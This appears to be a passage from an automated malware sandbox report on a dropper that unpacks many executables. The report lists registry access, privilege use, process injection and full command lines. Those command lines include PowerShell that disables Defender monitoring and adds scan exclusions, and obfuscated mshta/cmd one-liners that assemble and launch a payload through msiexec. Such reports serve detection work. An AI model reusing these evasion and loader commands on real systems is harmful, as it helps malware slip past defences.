Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768609156567246" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14d32a38896785b13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5088 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe
PID 3164 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 1632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1076 wrote to memory of 4772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3812 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 3540 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 4564 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3164 wrote to memory of 712 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3648 wrote to memory of 5020 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe
PID 4172 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe
PID 32 wrote to memory of 4236 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe
PID 208 wrote to memory of 2664 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe
PID 4564 wrote to memory of 4840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KMO4M.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$7015A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3164 -ip 3164

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4524 -ip 4524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 516 -ip 516

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 620

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\is-MQ2LG.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MQ2LG.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$90238,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0E3227A7\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 656

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 516 -ip 516

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 748

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 792

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 796

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcf958cc40,0x7ffcf958cc4c,0x7ffcf958cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2224,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2560 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 516 -ip 516

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4372,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1076

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1276

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4996,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3660,i,10605491294968867636,15737871089630305456,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 516 -ip 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 756

C:\Windows\SysWOW64\WerFault.exe

